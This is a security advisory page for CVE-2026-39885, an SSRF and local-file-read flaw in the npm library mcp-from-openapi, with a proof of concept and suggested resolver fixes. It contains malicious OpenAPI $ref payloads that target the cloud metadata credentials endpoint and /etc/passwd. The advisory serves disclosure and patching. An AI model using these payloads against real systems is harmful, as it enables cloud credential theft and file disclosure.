GHSA-V6PH-XCQ9-QXXJ

Vulnerability from github – Published: 2026-04-08 19:22 – Updated: 2026-04-09 14:29
VLAI?
Summary
mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications
Details

Summary

The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.

Affected Versions

<= 2.1.2 (latest)

CWE

CWE-918: Server-Side Request Forgery (SSRF)

Vulnerability Details

File: index.js lines 870-875

When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:

this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
  JSON.parse(JSON.stringify(this.document))
);

No options are passed to .dereference() — no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:

  • http:// and https:// URLs (internal services, cloud metadata)
  • file:// URLs (local filesystem)

This is the default behavior of json-schema-ref-parser — it resolves all $ref pointers by fetching the referenced resource.

Exploitation

Attack 1: SSRF to internal services / cloud metadata

A malicious OpenAPI spec containing:

{
  "openapi": "3.0.0",
  "info": { "title": "Evil API", "version": "1.0" },
  "paths": {
    "/test": {
      "get": {
        "operationId": "getTest",
        "summary": "test",
        "responses": {
          "200": {
            "description": "OK",
            "content": {
              "application/json": {
                "schema": {
                  "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
                }
              }
            }
          }
        }
      }
    }
  }
}

When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.

Attack 2: Local file read

{
  "$ref": "file:///etc/passwd"
}

The ref parser reads local files and includes their contents in the dereferenced output.

Proof of Concept

const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');

// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
    console.log(`SSRF HIT: ${req.method} ${req.url}`);
    res.writeHead(200, {'Content-Type': 'application/json'});
    res.end('{"type":"string"}');
});

srv.listen(9997, async () => {
    const spec = {
        openapi: '3.0.0',
        info: { title: 'Evil', version: '1.0' },
        paths: {
            '/test': {
                get: {
                    operationId: 'getTest',
                    summary: 'test',
                    responses: {
                        '200': {
                            description: 'OK',
                            content: {
                                'application/json': {
                                    schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
                                }
                            }
                        }
                    }
                }
            }
        }
    };

    const gen = new OpenAPIToolGenerator(spec, { validate: false });
    await gen.initialize();
    // Output: "SSRF HIT: GET /ssrf-proof"
    // The library fetched our attacker URL during $ref dereferencing.

    srv.close();
});

Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().

Impact

  • Cloud credential theft$ref pointing to http://169.254.169.254/ steals AWS/GCP/Azure metadata
  • Internal network scanning$ref values can probe internal services and ports
  • Local file readfile:// protocol reads arbitrary files from the server filesystem
  • No privileges required — attacker only needs to provide a crafted OpenAPI spec to any application using this library

Suggested Fix

Pass resolver options to dereference() that restrict which protocols and hosts are allowed:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: {
      file: false,        // Disable file:// protocol
      http: {
        // Only allow same-origin or explicitly allowed hosts
        headers: this.options.headers,
        timeout: this.options.timeout,
      }
    }
  }
);

Or disable all external resolution and require all schemas to be inline:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: { file: false, http: false, https: false }
  }
);
Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "mcp-from-openapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/sdk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/adapters"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:22:53Z",
    "nvd_published_at": "2026-04-08T21:17:00Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.\n\n\n## Affected Versions\n\n`\u003c= 2.1.2` (latest)\n\n## CWE\n\nCWE-918: Server-Side Request Forgery (SSRF)\n\n## Vulnerability Details\n\n**File:** `index.js` lines 870-875\n\nWhen `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`:\n\n```javascript\nthis.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(\n  JSON.parse(JSON.stringify(this.document))\n);\n```\n\nNo options are passed to `.dereference()` \u2014 no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including:\n\n- `http://` and `https://` URLs (internal services, cloud metadata)\n- `file://` URLs (local filesystem)\n\nThis is the default behavior of `json-schema-ref-parser` \u2014 it resolves all `$ref` pointers by fetching the referenced resource.\n\n## Exploitation\n\n### Attack 1: SSRF to internal services / cloud metadata\n\nA malicious OpenAPI spec containing:\n\n```json\n{\n  \"openapi\": \"3.0.0\",\n  \"info\": { \"title\": \"Evil API\", \"version\": \"1.0\" },\n  \"paths\": {\n    \"/test\": {\n      \"get\": {\n        \"operationId\": \"getTest\",\n        \"summary\": \"test\",\n        \"responses\": {\n          \"200\": {\n            \"description\": \"OK\",\n            \"content\": {\n              \"application/json\": {\n                \"schema\": {\n                  \"$ref\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\nWhen processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials.\n\n### Attack 2: Local file read\n\n```json\n{\n  \"$ref\": \"file:///etc/passwd\"\n}\n```\n\nThe ref parser reads local files and includes their contents in the dereferenced output.\n\n## Proof of Concept\n\n```javascript\nconst http = require(\u0027http\u0027);\nconst { OpenAPIToolGenerator } = require(\u0027mcp-from-openapi\u0027);\n\n// Start attacker server to prove SSRF\nconst srv = http.createServer((req, res) =\u003e {\n    console.log(`SSRF HIT: ${req.method} ${req.url}`);\n    res.writeHead(200, {\u0027Content-Type\u0027: \u0027application/json\u0027});\n    res.end(\u0027{\"type\":\"string\"}\u0027);\n});\n\nsrv.listen(9997, async () =\u003e {\n    const spec = {\n        openapi: \u00273.0.0\u0027,\n        info: { title: \u0027Evil\u0027, version: \u00271.0\u0027 },\n        paths: {\n            \u0027/test\u0027: {\n                get: {\n                    operationId: \u0027getTest\u0027,\n                    summary: \u0027test\u0027,\n                    responses: {\n                        \u0027200\u0027: {\n                            description: \u0027OK\u0027,\n                            content: {\n                                \u0027application/json\u0027: {\n                                    schema: { \u0027$ref\u0027: \u0027http://127.0.0.1:9997/ssrf-proof\u0027 }\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    };\n\n    const gen = new OpenAPIToolGenerator(spec, { validate: false });\n    await gen.initialize();\n    // Output: \"SSRF HIT: GET /ssrf-proof\"\n    // The library fetched our attacker URL during $ref dereferencing.\n\n    srv.close();\n});\n```\n\n**Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`.\n\n## Impact\n\n- **Cloud credential theft** \u2014 `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata\n- **Internal network scanning** \u2014 `$ref` values can probe internal services and ports\n- **Local file read** \u2014 `file://` protocol reads arbitrary files from the server filesystem\n- **No privileges required** \u2014 attacker only needs to provide a crafted OpenAPI spec to any application using this library\n\n## Suggested Fix\n\nPass resolver options to `dereference()` that restrict which protocols and hosts are allowed:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: {\n      file: false,        // Disable file:// protocol\n      http: {\n        // Only allow same-origin or explicitly allowed hosts\n        headers: this.options.headers,\n        timeout: this.options.timeout,\n      }\n    }\n  }\n);\n```\n\nOr disable all external resolution and require all schemas to be inline:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: { file: false, http: false, https: false }\n  }\n);\n```",
  "id": "GHSA-v6ph-xcq9-qxxj",
  "modified": "2026-04-09T14:29:54Z",
  "published": "2026-04-08T19:22:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/frontmcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.